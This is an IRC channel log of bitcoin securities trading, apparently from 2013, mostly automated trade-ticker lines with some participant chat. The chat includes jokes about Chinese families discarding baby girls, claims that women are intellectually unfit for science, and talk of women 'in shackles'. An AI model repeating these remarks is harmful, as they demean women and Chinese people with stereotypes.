[TAT.ASICMINER] 1 @ 0.02489 BTC [-] May 30 15:47:19 [BTCTC] [ASICMINER-PT] 1 @ 2.460002 BTC [-] May 30 15:47:49 ThickAsThieves: lol@ u baiting usagi May 30 15:47:50 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1971 = 0.3942 BTC [-] May 30 15:47:53 [BTCTC] [CRYPTO-TRADE] 5 @ 0.197 = 0.985 BTC [-] May 30 15:47:57 [BTCTC] [CRYPTO-TRADE] 6 @ 0.19601 = 1.1761 BTC [-] May 30 15:48:04 [BTCTC] [ASICMINER-PT] 2 @ 2.25 = 4.5 BTC [-] May 30 15:48:14 2.25! May 30 15:48:29 [BTCTC] [ASICMINER-PT] 1 @ 2.487 BTC [+] May 30 15:48:51 [BTCTC] [ASICMINER-PT] 2 @ 2.46 = 4.92 BTC [-] May 30 15:48:51 oh, lulz May 30 15:49:02 you got options trolled May 30 15:49:15 yeah haha May 30 15:49:26 you got pm May 30 15:49:26 [BTCTC] [ASICMINER-PT] 2 @ 2.25 = 4.5 BTC [-] May 30 15:51:02 [HAVELOCK] [ASICM] 20 @ 0.025 = 0.5 BTC [+] May 30 15:51:03 [HAVELOCK] [ASICM] 180 @ 0.025 = 4.5 BTC [+] May 30 15:53:45 [BTCTC] [TAT.ASICMINER] 390 @ 0.02489 = 9.7071 BTC [-] May 30 15:53:47 [BTCTC] [TAT.ASICMINER] 45 @ 0.02489 = 1.1201 BTC [-] May 30 15:54:32 [BTCTC] [TAT.ASICMINER] 45 @ 0.02489 = 1.1201 BTC [-] May 30 15:55:11 [BTCTC] [ASICMINER-PT] 2 @ 2.48 = 4.96 BTC [+] May 30 15:55:24 [BTCTC] [TAT.ASICMINER] 8 @ 0.024899 = 0.1992 BTC [+] May 30 15:56:03 [HAVELOCK] [ASICM] 4 @ 0.0244 = 0.0976 BTC [-] May 30 15:56:04 [HAVELOCK] [ASICM] 2 @ 0.0244 = 0.0488 BTC [-] May 30 15:56:05 [HAVELOCK] [ASICM] 194 @ 0.0243002 = 4.7142 BTC [-] May 30 15:56:55 [BTCTC] [TAT.ASICMINER] 4 @ 0.02493 = 0.0997 BTC [+] May 30 15:58:05 [HAVELOCK] [ASICM] 1 @ 0.0245 BTC [+] May 30 15:58:26 [BTCTC] [ASICMINER-PT] 1 @ 2.487 BTC [+] May 30 15:58:31 [MPEX] [S.MPOE] 9201 @ 0.00072769 = 6.6955 BTC [+] May 30 15:59:05 [MPEX] [S.MPOE] 3070 @ 0.00072519 = 2.2263 BTC [-] May 30 15:59:11 [MPEX] [S.MPOE] 8730 @ 0.00072486 = 6.328 BTC [-] May 30 16:00:22 [BTCTC] [TAT.ASICMINER] 6 @ 0.02493 = 0.1496 BTC [+] May 30 16:00:26 [BTCTC] [TAT.ASICMINER] 34 @ 0.024948 = 0.8482 BTC [+] May 30 16:02:09 [BTCTC] [TAT.ASICMINER] 10 @ 0.024948 = 0.2495 BTC [+] May 30 16:04:15 [BTCTC] [TAT.ASICMINER] 4 @ 0.024948 = 0.0998 BTC [+] May 30 16:05:03 [HAVELOCK] [ASICM] 10 @ 0.0249 = 0.249 BTC [+] May 30 16:05:49 [BTCTC] [ASICMINER-PT] 1 @ 2.487 BTC [+] May 30 16:07:48 [BTCTC] [ASICMINER-PT] 2 @ 2.25 = 4.5 BTC [-] May 30 16:09:13 [BTCTC] [ASICMINER-PT] 1 @ 2.487 BTC [+] May 30 16:10:14 [MPEX] [S.MPOE] 7100 @ 0.00072486 = 5.1465 BTC [-] May 30 16:10:20 [BTCTC] [ASICMINER-PT] 2 @ 2.486 = 4.972 BTC [-] May 30 16:10:38 [BTCTC] [TAT.ASICMINER] 45 @ 0.024948 = 1.1227 BTC [+] May 30 16:12:03 [HAVELOCK] [ASICM] 200 @ 0.0243002 = 4.86 BTC [-] May 30 16:12:46 [BTCTC] [TAT.ASICMINER] 2 @ 0.024948 = 0.0499 BTC [+] May 30 16:12:50 [BTCTC] [TAT.ASICMINER] 9 @ 0.024949 = 0.2245 BTC [+] May 30 16:13:03 [HAVELOCK] [ASICM] 364 @ 0.0243002 = 8.8453 BTC [-] May 30 16:13:05 [HAVELOCK] [ASICM] 92 @ 0.0243002 = 2.2356 BTC [-] May 30 16:13:06 [HAVELOCK] [ASICM] 2 @ 0.0243002 = 0.0486 BTC [-] May 30 16:14:02 [HAVELOCK] [ASICM] 1 @ 0.0243002 BTC [-] May 30 16:15:03 [HAVELOCK] [ASICM] 55 @ 0.02430001 = 1.3365 BTC [-] May 30 16:15:04 [HAVELOCK] [ASICM] 309 @ 0.02430001 = 7.5087 BTC [-] May 30 16:15:14 [BTCTC] [ASICMINER-PT] 2 @ 2.25 = 4.5 BTC [-] May 30 16:15:16 [BTCTC] [TAT.ASICMINER] 8 @ 0.02467 = 0.1974 BTC [-] May 30 16:15:19 [BTCTC] [TAT.ASICMINER] 10 @ 0.02466 = 0.2466 BTC [-] May 30 16:15:22 [BTCTC] [TAT.ASICMINER] 13 @ 0.0246 = 0.3198 BTC [-] May 30 16:15:45 [BTCTC] [ASICMINER-PT] 1 @ 2.489 BTC [+] May 30 16:16:02 [BTCTC] [TAT.ASICMINER] 5 @ 0.0248 = 0.124 BTC [+] May 30 16:16:04 [BTCTC] [TAT.ASICMINER] 15 @ 0.0248 = 0.372 BTC [+] May 30 16:16:05 [BTCTC] [TAT.ASICMINER] 4 @ 0.02451 = 0.098 BTC [-] May 30 16:16:07 [BTCTC] [TAT.ASICMINER] 13 @ 0.0245 = 0.3185 BTC [-] May 30 16:16:24 [BTCTC] [TAT.ASICMINER] 20 @ 0.0245 = 0.49 BTC [-] May 30 16:19:03 [HAVELOCK] [ASICM] 3 @ 0.02430001 = 0.0729 BTC [-] May 30 16:19:31 [MPEX] [S.MPOE] 3300 @ 0.00072486 = 2.392 BTC [-] May 30 16:20:03 [HAVELOCK] [VTX] 5 @ 0.4396 = 2.198 BTC [+] May 30 16:21:03 [HAVELOCK] [VTX] 6 @ 0.4397 = 2.6382 BTC [+] May 30 16:28:03 [HAVELOCK] [ASICM] 1 @ 0.02445 BTC [+] May 30 16:32:29 [BTCTC] [PAJKA.BOND] 1 @ 0.10998 BTC [+] May 30 16:35:18 [BTCTC] [S.BBET-PT] 1 @ 0.0039 BTC [+] May 30 16:39:28 [BTCTC] [ASICMINER-PT] 1 @ 2.477001 BTC [-] May 30 16:40:46 [BTCTC] [TAT.ASICMINER] 7 @ 0.024945 = 0.1746 BTC [+] May 30 16:47:08 [BTCTC] [TAT.ASICMINER] 18 @ 0.02493 = 0.4487 BTC [-] May 30 16:47:45 [BTCTC] [BASIC-MINING] 1 @ 0.64 BTC [+] May 30 16:49:17 [BTCTC] [S.BBET-PT] 2 @ 0.0022 = 0.0044 BTC [-] May 30 16:50:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.02493 = 0.0499 BTC [-] May 30 16:51:32 [BTCTC] [S.MPOE-PT] 1 @ 0.000709 BTC [-] May 30 16:53:49 [BTCTC] [TAT.ASICMINER] 60 @ 0.02493 = 1.4958 BTC [-] May 30 16:58:54 [BTCTC] [TAT.ASICMINER] 5 @ 0.02493 = 0.1247 BTC [-] May 30 16:58:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.024945 = 0.0499 BTC [+] May 30 16:58:57 [BTCTC] [TAT.ASICMINER] 33 @ 0.024949 = 0.8233 BTC [+] May 30 16:59:04 [BTCTC] [TAT.ASICMINER] 100 @ 0.024949 = 2.4949 BTC [+] May 30 16:59:48 [BTCTC] [TAT.ASICMINER] 3 @ 0.024979 = 0.0749 BTC [+] May 30 17:03:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.02497 = 0.0499 BTC [-] May 30 17:03:05 [BTCTC] [S.DICE-PT] 19 @ 0.00289 = 0.0549 BTC [+] May 30 17:04:30 [BTCTC] [GSDPT] 10 @ 0.003448 = 0.0345 BTC [+] May 30 17:06:14 [BTCTC] [TAT.ASICMINER] 20 @ 0.02497 = 0.4994 BTC [-] May 30 17:06:24 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [+] May 30 17:08:22 [BTCTC] [TAT.ASICMINER] 10 @ 0.02497 = 0.2497 BTC [-] May 30 17:15:42 [MPEX] [S.MPOE] 12112 @ 0.00072486 = 8.7795 BTC [-] May 30 17:19:05 goat http://i.imgur.com/KtVy9DD.jpg May 30 17:19:12 [MPEX] [S.MPOE] 5963 @ 0.00072619 = 4.3303 BTC [+] May 30 17:20:04 [HAVELOCK] [ASICM] 1 @ 0.0243 BTC [-] May 30 17:24:22 [MPEX] [S.MPOE] 2501 @ 0.00072486 = 1.8129 BTC [-] May 30 17:24:24 [MPEX] [S.MPOE] 1499 @ 0.00072433 = 1.0858 BTC [-] May 30 17:25:03 [BTCTC] [TAT.ASICMINER] 9 @ 0.02497 = 0.2247 BTC [-] May 30 17:28:03 [HAVELOCK] [ASICM] 8 @ 0.0243 = 0.1944 BTC [-] May 30 17:28:16 [MPEX] [S.MPOE] 3220 @ 0.00072619 = 2.3383 BTC [+] May 30 17:28:17 [MPEX] [S.MPOE] 1580 @ 0.00072715 = 1.1489 BTC [+] May 30 17:30:13 [MPEX] [S.MPOE] 2870 @ 0.00072715 = 2.0869 BTC [+] May 30 17:30:18 [MPEX] [S.MPOE] 1780 @ 0.00072769 = 1.2953 BTC [+] May 30 17:30:29 [BTCTC] [ASICMINER-PT] 1 @ 2.4761 BTC [-] May 30 17:32:29 [BTCTC] [ASICMINER-PT] 2 @ 2.25 = 4.5 BTC [-] May 30 17:33:10 [BTCTC] [ASICMINER-PT] 2 @ 2.4761 = 4.9522 BTC [+] May 30 17:33:54 [BTCTC] [ASICMINER-PT] 3 @ 2.25 = 6.75 BTC [-] May 30 17:34:32 [BTCTC] [TAT.ASICMINER] 13 @ 0.02497 = 0.3246 BTC [-] May 30 17:34:46 [BTCTC] [ASICMINER-PT] 1 @ 2.476 BTC [+] May 30 17:35:21 [BTCTC] [ASICMINER-PT] 1 @ 2.475 BTC [-] May 30 17:35:48 [BTCTC] [TAT.ASICMINER] 30 @ 0.0248 = 0.744 BTC [-] May 30 17:35:50 [BTCTC] [TAT.ASICMINER] 5 @ 0.02478 = 0.1239 BTC [-] May 30 17:35:50 [BTCTC] [TAT.ASICMINER] 30 @ 0.024777 = 0.7433 BTC [-] May 30 17:35:52 [BTCTC] [TAT.ASICMINER] 10 @ 0.02472 = 0.2472 BTC [-] May 30 17:36:00 [BTCTC] [TAT.ASICMINER] 15 @ 0.024718 = 0.3708 BTC [-] May 30 17:36:03 [HAVELOCK] [ASICM] 191 @ 0.0243 = 4.6413 BTC [-] May 30 17:36:05 [BTCTC] [ASICMINER-PT] 1 @ 2.474 BTC [-] May 30 17:36:07 [BTCTC] [TAT.ASICMINER] 10 @ 0.02466 = 0.2466 BTC [-] May 30 17:36:09 [BTCTC] [TAT.ASICMINER] 2 @ 0.024622 = 0.0492 BTC [-] May 30 17:36:10 [BTCTC] [TAT.ASICMINER] 3 @ 0.024602 = 0.0738 BTC [-] May 30 17:36:12 [BTCTC] [TAT.ASICMINER] 3 @ 0.0246 = 0.0738 BTC [-] May 30 17:36:13 [BTCTC] [TAT.ASICMINER] 4 @ 0.0246 = 0.0984 BTC [-] May 30 17:36:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.0246 BTC [-] May 30 17:36:44 [BTCTC] [ASICMINER-PT] 3 @ 2.25 = 6.75 BTC [-] May 30 17:36:45 [BTCTC] [TAT.ASICMINER] 33 @ 0.02451 = 0.8088 BTC [-] May 30 17:36:46 [BTCTC] [TAT.ASICMINER] 7 @ 0.02451 = 0.1716 BTC [-] May 30 17:36:48 [BTCTC] [TAT.ASICMINER] 20 @ 0.024501 = 0.49 BTC [-] May 30 17:37:00 [BTCTC] [TAT.ASICMINER] 3 @ 0.0245 = 0.0735 BTC [-] May 30 17:37:20 [MPEX] [O.USD.P131N] 5 @ 0.3 = 1.5 BTC May 30 17:37:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.02497 = 0.0499 BTC [+] May 30 17:38:23 [BTCTC] [ASICMINER-PT] 1 @ 2.464001 BTC [+] May 30 17:38:46 [BTCTC] [ASICMINER-PT] 5 @ 2 = 10 BTC [-] May 30 17:38:55 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [+] May 30 17:39:33 [BTCTC] [ASICMINER-PT] 1 @ 2.4603 BTC [+] May 30 17:39:59 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 30 17:40:37 [BTCTC] [ASICMINER-PT] 5 @ 2.4602 = 12.301 BTC [+] May 30 17:41:01 [BTCTC] [ASICMINER-PT] 6 @ 2 = 12 BTC [-] May 30 17:41:15 [BTCTC] [ASICMINER-PT] 6 @ 2.46 = 14.76 BTC [+] May 30 17:41:37 [BTCTC] [ASICMINER-PT] 7 @ 2 = 14 BTC [-] May 30 17:41:58 [BTCTC] [ASICMINER-PT] 2 @ 2.46 = 4.92 BTC [+] May 30 17:42:01 [BTCTC] [ASICMINER-PT] 1 @ 2.455401 BTC [-] May 30 17:42:03 [BTCTC] [ASICMINER-PT] 1 @ 2.4554 BTC [-] May 30 17:42:07 [BTCTC] [ASICMINER-PT] 1 @ 2.4551 BTC [-] May 30 17:42:13 [BTCTC] [ASICMINER-PT] 2 @ 2.453002 = 4.906 BTC [-] May 30 17:42:30 [BTCTC] [ASICMINER-PT] 2 @ 2 = 4 BTC [-] May 30 17:42:44 [BTCTC] [ASICMINER-PT] 1 @ 2.1 BTC [+] May 30 17:43:25 [BTCTC] [ASICMINER-PT] 5 @ 2.25 = 11.25 BTC [+] May 30 17:43:55 [BTCTC] [ASICMINER-PT] 3 @ 2.450001 = 7.35 BTC [+] May 30 17:43:59 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [-] May 30 17:44:01 [BTCTC] [ASICMINER-PT] 4 @ 2.44 = 9.76 BTC [-] May 30 17:44:14 [BTCTC] [ASICMINER-PT] 2 @ 2.25 = 4.5 BTC [-] May 30 17:44:48 [BTCTC] [ASICMINER-PT] 7 @ 2.25 = 15.75 BTC [-] May 30 17:45:07 [BTCTC] [ASICMINER-PT] 6 @ 2.44 = 14.64 BTC [+] May 30 17:45:09 [BTCTC] [ASICMINER-PT] 1 @ 2.436 BTC [-] May 30 17:45:12 [BTCTC] [ASICMINER-PT] 1 @ 2.435 BTC [-] May 30 17:45:14 [BTCTC] [ASICMINER-PT] 1 @ 2.431 BTC [-] May 30 17:47:03 [HAVELOCK] [ASICM] 91 @ 0.0244 = 2.2204 BTC [+] May 30 17:47:34 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 30 17:47:48 [BTCTC] [ASICMINER-PT] 7 @ 2.25 = 15.75 BTC [-] May 30 17:48:03 [HAVELOCK] [ASICM] 9 @ 0.02445 = 0.2201 BTC [+] May 30 17:48:06 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 30 17:49:41 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 30 17:50:13 [BTCTC] [ASICMINER-PT] 1 @ 2.4264 BTC [+] May 30 17:50:15 [BTCTC] [ASICMINER-PT] 1 @ 2.425604 BTC [-] May 30 17:50:16 [BTCTC] [ASICMINER-PT] 1 @ 2.42 BTC [-] May 30 17:50:18 [BTCTC] [ASICMINER-PT] 6 @ 2.4101 = 14.4606 BTC [-] May 30 17:50:32 [BTCTC] [ASICMINER-PT] 4 @ 2.25 = 9 BTC [-] May 30 17:50:49 [BTCTC] [ASICMINER-PT] 5 @ 2.25 = 11.25 BTC [-] May 30 17:51:15 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 30 17:51:46 [MPEX] [S.MPOE] 919 @ 0.00072769 = 0.6687 BTC [+] May 30 17:54:03 [HAVELOCK] [ASICM] 828 @ 0.02445 = 20.2446 BTC [+] May 30 17:56:16 [BTCTC] [COGNITIVE] 1 @ 0.329799 BTC [+] May 30 17:56:44 [BTCTC] [COGNITIVE] 5 @ 0.33 = 1.65 BTC [+] May 30 17:57:03 [HAVELOCK] [ASICM] 37 @ 0.0249999 = 0.925 BTC [+] May 30 17:57:23 [BTCTC] [COGNITIVE] 1 @ 0.3398 BTC [+] May 30 18:01:59 [BTCTC] [ASICMINER-PT] 4 @ 2.45 = 9.8 BTC [+] May 30 18:02:01 [BTCTC] [ASICMINER-PT] 2 @ 2.46 = 4.92 BTC [+] May 30 18:04:23 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 30 18:05:18 [BTCTC] [BASIC-MINING] 5 @ 0.64 = 3.2 BTC [+] May 30 18:05:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.0249 BTC [-] May 30 18:06:08 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [-] May 30 18:07:03 [HAVELOCK] [ASICM] 95 @ 0.02499999 = 2.375 BTC [+] May 30 18:10:03 [HAVELOCK] [VTX] 1 @ 0.4397 BTC [+] May 30 18:11:03 [HAVELOCK] [VTX] 1 @ 0.4397 BTC [+] May 30 18:25:24 [MPEX] [S.MPOE] 6600 @ 0.00072991 = 4.8174 BTC [+] May 30 18:27:29 [BTCTC] [TAT.ASICMINER] 12 @ 0.024898 = 0.2988 BTC [-] May 30 18:29:04 [BTCTC] [GSDPT] 3 @ 0.0032 = 0.0096 BTC [-] May 30 18:31:04 [HAVELOCK] [ASICM] 4 @ 0.02499998 = 0.1 BTC [-] May 30 18:35:04 [HAVELOCK] [ASICM] 76 @ 0.02499998 = 1.9 BTC [-] May 30 18:37:29 [BTCTC] [TAT.ASICMINER] 3 @ 0.024897 = 0.0747 BTC [-] May 30 18:37:31 [BTCTC] [TAT.ASICMINER] 3 @ 0.024898 = 0.0747 BTC [+] May 30 18:38:03 [HAVELOCK] [ASICM] 19 @ 0.02499999 = 0.475 BTC [+] May 30 18:38:36 [BTCTC] [ASICMINER-PT] 1 @ 2.421001 BTC [+] May 30 18:39:31 [BTCTC] [ASICMINER-PT] 1 @ 2.44 BTC [+] May 30 18:39:33 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [+] May 30 18:41:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.024897 BTC [-] May 30 18:44:46 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 30 18:45:19 [MPEX] [S.MPOE] 5800 @ 0.00072874 = 4.2267 BTC [-] May 30 18:45:21 [MPEX] [S.MPOE] 11531 @ 0.00072865 = 8.4021 BTC [-] May 30 18:45:34 [MPEX] [S.MPOE] 9450 @ 0.00072665 = 6.8668 BTC [-] May 30 18:45:35 [MPEX] [S.MPOE] 4701 @ 0.00072433 = 3.4051 BTC [-] May 30 18:45:37 [MPEX] [S.MPOE] 7952 @ 0.00072432 = 5.7598 BTC [-] May 30 18:45:39 [MPEX] [S.MPOE] 7655 @ 0.00072398 = 5.5421 BTC [-] May 30 18:45:49 [MPEX] [S.MPOE] 3411 @ 0.00072394 = 2.4694 BTC [-] May 30 18:47:01 [BTCTC] [TAT.ASICMINER] 11 @ 0.02485 = 0.2734 BTC [-] May 30 18:47:28 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [+] May 30 18:48:05 [HAVELOCK] [ASICM] 1 @ 0.02495 BTC [-] May 30 18:49:16 [BTCTC] [ASICMINER-PT] 2 @ 2.46 = 4.92 BTC [+] May 30 18:51:54 [BTCTC] [ASICMINER-PT] 2 @ 2.25 = 4.5 BTC [-] May 30 18:52:24 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [+] May 30 18:52:43 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] May 30 18:55:19 [BTCTC] [BTC-BOND] 24 @ 0.01 = 0.24 BTC [-] May 30 18:55:20 [BTCTC] [TAT.ASICMINER] 56 @ 0.02485 = 1.3916 BTC [-] May 30 18:55:22 [BTCTC] [TAT.ASICMINER] 8 @ 0.02485 = 0.1988 BTC [-] May 30 19:02:10 ;;seen bowjob May 30 19:03:14 ;;gief bowjobs May 30 19:11:41 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 30 19:12:14 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [+] May 30 19:16:11 [BTCTC] [TAT.ASICMINER] 3 @ 0.0247 = 0.0741 BTC [-] May 30 19:16:13 [BTCTC] [TAT.ASICMINER] 3 @ 0.0246 = 0.0738 BTC [-] May 30 19:16:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.024564 = 0.0491 BTC [-] May 30 19:16:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.024562 BTC [-] May 30 19:16:19 [BTCTC] [TAT.ASICMINER] 4 @ 0.02456 = 0.0982 BTC [-] May 30 19:16:21 [BTCTC] [TAT.ASICMINER] 9 @ 0.02456 = 0.221 BTC [-] May 30 19:21:05 [BTCTC] [TAT.ASICMINER] 5 @ 0.02485 = 0.1243 BTC [+] May 30 19:29:08 [BTCTC] [RSM] 1 @ 0.00976 BTC [-] May 30 19:36:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.02485 BTC [+] May 30 19:37:43 http://trilema.com/wp-content/uploads/2009/07/big-in-china.jpg May 30 19:37:47 i'm officially big in china nao. May 30 19:37:53 [BTCTC] [TAT.ASICMINER] 117 @ 0.02485 = 2.9075 BTC [+] May 30 19:37:59 [BTCTC] [TAT.ASICMINER] 3 @ 0.02485 = 0.0746 BTC [+] May 30 19:38:48 nice May 30 19:39:05 pft, china lags behind slovenia May 30 19:39:08 i had a bitcoin mining writeup on ubuntu 8.04 that the chinese were killing in 2011 May 30 19:39:14 unsure why May 30 19:39:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.024898 = 0.0498 BTC [+] May 30 19:40:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.024898 BTC [+] May 30 19:40:58 oh snap! MPEX! China welcomes you. May 30 19:41:13 dun dun dun May 30 19:41:23 kakobrekla that is true :D May 30 19:41:26 with billions of open arms May 30 19:41:44 jcpham because they're smarter than whitey ? May 30 19:42:04 [HAVELOCK] [ASICM] 10 @ 0.02495 = 0.2495 BTC [-] May 30 19:42:10 because they throw away the women? May 30 19:42:26 china has nothing on somalia May 30 19:42:34 hehe May 30 19:42:41 and i know somalia May 30 19:42:42 jcpham lol tell summers that May 30 19:43:11 or who was the guy they kicked out cause he dared say women are absent in sciences because dumb in the head. May 30 19:43:38 I would love a link to that. or a name. May 30 19:43:43 more of a chinese flushing baby girls joke, but haha May 30 19:43:54 omg no lol May 30 19:44:01 most foul May 30 19:44:05 but funny May 30 19:44:18 http://en.wikipedia.org/wiki/Lawrence_Summers May 30 19:44:25 ah tks! May 30 19:45:03 [HAVELOCK] [SDICE] 1 @ 0.2443 BTC [+] May 30 19:47:03 [HAVELOCK] [HIM] 1 @ 2.6502 BTC [-] May 30 19:48:03 [HAVELOCK] [HIM] 1 @ 2.6502 BTC [-] May 30 19:54:03 [HAVELOCK] [ASICM] 59 @ 0.02495 = 1.4721 BTC [-] May 30 19:55:55 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [+] May 30 19:56:20 [BTCTC] [ASICMINER-PT] 1 @ 2.479 BTC [+] May 30 19:56:21 [BTCTC] [ASICMINER-PT] 1 @ 2.4799 BTC [+] May 30 19:57:42 [BTCTC] [PAJKA.BOND] 5 @ 0.10801 = 0.5401 BTC [-] May 30 19:58:17 [BTCTC] [BASIC-MINING] 1 @ 0.63999 BTC [-] May 30 20:03:04 Is EV selling more S.DICE shares? Or some other investor? May 30 20:03:10 0.00350000 2`000`000 May 30 20:03:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.024898 = 0.0498 BTC [+] May 30 20:03:39 [BTCTC] [S.DICE-PT] 4 @ 0.002932 = 0.0117 BTC [+] May 30 20:04:14 thats an askwall May 30 20:04:22 new May 30 20:05:21 ;;bc,stats May 30 20:05:29 gribble is death May 30 20:05:35 not announced anything at any rate. May 30 20:06:35 you mentioned you were selling those AM shares May 30 20:06:38 for a project May 30 20:06:38 so s.dice market is 20/32 heh. May 30 20:07:01 s.bbet is 8.5/15 May 30 20:07:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.024889 = 0.0498 BTC [-] May 30 20:07:19 people need to get with the program i guess. what sort of nonsense wide open markets are these. May 30 20:07:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.024898 BTC [+] May 30 20:07:45 mircea_popescu: need market maker accounts May 30 20:07:45 [BTCTC] [ASICMINER-PT] 1 @ 2.4845 BTC [+] May 30 20:07:57 [BTCTC] [ASICMINER-PT] 1 @ 2.4845 BTC [+] May 30 20:08:04 fiat500 too much chasing the lottery ticket going on. May 30 20:08:16 [BTCTC] [ASICMINER-PT] 2 @ 2.4849 = 4.9698 BTC [+] May 30 20:08:22 i suppose it would be difficult to profit off the spread May 30 20:08:42 This guy has monetized scamcoin creation... https://bitcointalk.org/index.php?topic=220367.new#new May 30 20:08:46 what a shitbird May 30 20:08:46 meanwhile s.mpoe is tigther than google May 30 20:08:49 what the fuck already May 30 20:08:50 i've been spending more time building portfolios for others May 30 20:08:59 if i'm being honest May 30 20:09:00 kinda got bored May 30 20:09:02 [BTCTC] [TAT.ASICMINER] 4 @ 0.024898 = 0.0996 BTC [+] May 30 20:09:39 mircea_popescu: 96% of people interested in bitcoin are male May 30 20:09:42 how do we fix this? May 30 20:09:53 pinterest and instagram May 30 20:10:26 we don't fix it. May 30 20:10:45 the future of the world is being 96% male, with 0.001% getting the 4% females in shackles and walled orchards. May 30 20:10:49 FemiCoin will fix dat. May 30 20:11:16 RagCoin? May 30 20:11:33 first time for me too, Chaang-Noi May 30 20:11:33 If somebody interested in BTC/USD OTC options - let me know at vorandrew@gmail.com May 30 20:12:02 santacruz better yet, get soem btc together trade on mpex/coinbr. May 30 20:13:11 [BTCTC] [ASICMINER-PT] 2 @ 2.25 = 4.5 BTC [-] May 30 20:13:13 spreads are too big... however we must talk about possible cooperation May 30 20:13:20 Chaang-Noi: all links have that message now May 30 20:13:23 as far as I can see May 30 20:13:49 jcpham: pininterest lol May 30 20:13:49 so if the spreads are too wide go inside the market. May 30 20:13:52 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [+] May 30 20:13:54 what's to talk really ? May 30 20:15:35 [MPEX] [S.MPOE] 5500 @ 0.00072469 = 3.9858 BTC [+] May 30 20:15:50 mircea_popescu: 96% male... the "clever poor" fellows will break out the baccilae long before then. May 30 20:16:17 arise ye beta masses, and arm yourselves with liberators May 30 20:16:25 HAHAHAHAHA May 30 20:16:37 self print, self satisfy, selfselftw ? May 30 20:16:53 Girls will never sleep with beta males even if they are the last remnants on earth. May 30 20:17:01 philosophical question, almost; is a beta with a nuke still beta May 30 20:17:09 yes. May 30 20:17:18 a beta is defined by thestringpuller's excellent observation above. May 30 20:18:07 Beta males will always be needy. May 30 20:18:15 Just as alpha males will always be awesome. May 30 20:18:37 reasonable. so, the alpha folks can feel very noble and courageous as they crawl to the graveyard with everybody else. May 30 20:18:53 And that's how the human race dies. May 30 20:19:19 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] May 30 20:20:17 [BTCTC] [ASICMINER-PT] 1 @ 2.451 BTC [-] May 30 20:20:19 [BTCTC] [ASICMINER-PT] 1 @ 2.451 BTC [-] May 30 20:20:26 !ticker m ^OIX May 30 20:20:27 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / / ( shares, BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) May 30 20:20:36 [BTCTC] [ASICMINER-PT] 3 @ 2.45 = 7.35 BTC [-] May 30 20:20:59 I think when OIX is 0, either the price is very stable or the prie is very volatile... May 30 20:23:18 [BTCTC] [TAT.ASICMINER] 70 @ 0.024889 = 1.7422 BTC [-] May 30 20:24:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.024889 BTC [-] May 30 20:25:27 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] May 30 20:26:33 [BTCTC] [TAT.ASICMINER] 8 @ 0.024898 = 0.1992 BTC [+] May 30 20:26:36 [BTCTC] [TAT.ASICMINER] 9 @ 0.0249 = 0.2241 BTC [+] May 30 20:26:42 [BTCTC] [TAT.ASICMINER] 12 @ 0.024909 = 0.2989 BTC [+] May 30 20:27:38 [BTCTC] [TAT.ASICMINER] 22 @ 0.024909 = 0.548 BTC [+] May 30 20:27:40 [BTCTC] [TAT.ASICMINER] 18 @ 0.02491 = 0.4484 BTC [+] May 30 20:31:16 [BTCTC] [TAT.ASICMINER] 2 @ 0.02491 = 0.0498 BTC [+] May 30 20:31:47 [BTCTC] [TAT.ASICMINER] 3 @ 0.024889 = 0.0747 BTC [-] May 30 20:32:19 [BTCTC] [TAT.ASICMINER] 12 @ 0.02488 = 0.2986 BTC [-] May 30 20:32:41 [BTCTC] [TAT.ASICMINER] 33 @ 0.0248 = 0.8184 BTC [-] May 30 20:32:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.02456 BTC [-] May 30 20:33:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.02456 BTC [-] May 30 20:33:03 [HAVELOCK] [ASICM] 4 @ 0.02495 = 0.0998 BTC [-] May 30 20:37:43 [BTCTC] [ASICMINER-PT] 1 @ 2.25 BTC [-] May 30 20:39:12 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] May 30 20:39:45 [MPEX] [S.MPOE] 1900 @ 0.00072567 = 1.3788 BTC [+] May 30 20:39:47 [MPEX] [S.MPOE] 3300 @ 0.00072394 = 2.389 BTC [-] May 30 20:41:55 don't say that Chaang-Noi -- they are my last out besides localbitcoins May 30 20:42:11 [MPEX] [S.MPOE] 2292 @ 0.00072394 = 1.6593 BTC [-] May 30 20:42:54 [BTCTC] 